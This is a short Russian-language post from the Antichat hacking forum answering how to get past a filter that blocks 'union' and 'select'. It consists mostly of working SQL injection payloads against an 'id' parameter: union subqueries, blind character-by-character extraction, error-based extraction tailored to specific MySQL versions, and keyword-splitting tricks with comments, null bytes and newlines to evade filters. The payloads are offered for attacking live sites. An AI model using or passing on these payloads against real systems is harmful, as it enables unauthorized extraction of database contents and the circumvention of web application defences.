Форум АНТИЧАТ - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от LBC

что делать если union и select в связке фильтруются

Подзапросы, крутить как слепую, вывод в ошибке

Код:

sql.php?id=2+union+(select+1,2,table_name,4,5+from+information_schema.tables)

and etc

Код:

sql.php?id=2+and+(select+ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))+from+information_schema.tables+limit+0,1)>66

and etc

Вывод через ошибку без использования Union

Для Mysql 4.1>=

Код:

sql.php?id=2+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)

Код:

sql.php?id=2+or+1+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+having+min(0)

Для Mysql 5.1>=

Код:

sql.php?id=2+and+extractvalue(1,concat(0x5c,((select+table_name+from+information_schema.tables+limit+0,1))))

Для Mysql 5.0.12 > 5.0.64

Код:

sql.php?id=1+or+(1,2)=(select*from(select+name_const((select+table_name+from+information_schema.tables+limit+0,1),1),name_const((select+table_name+from+information_schema.tables+limit+0,1),1))a)

Можно еще попробовать обойти так

Код:

sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4,5

Код:

sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5

Код:

sql.php?id=2/**/union/**/select/**/1,2,3,4,5

Код:

sql.php?id=2+union+%0A+select+1,2,3,4,5

Вариантов куча, всего не перечислишь, думаю этого должно хватить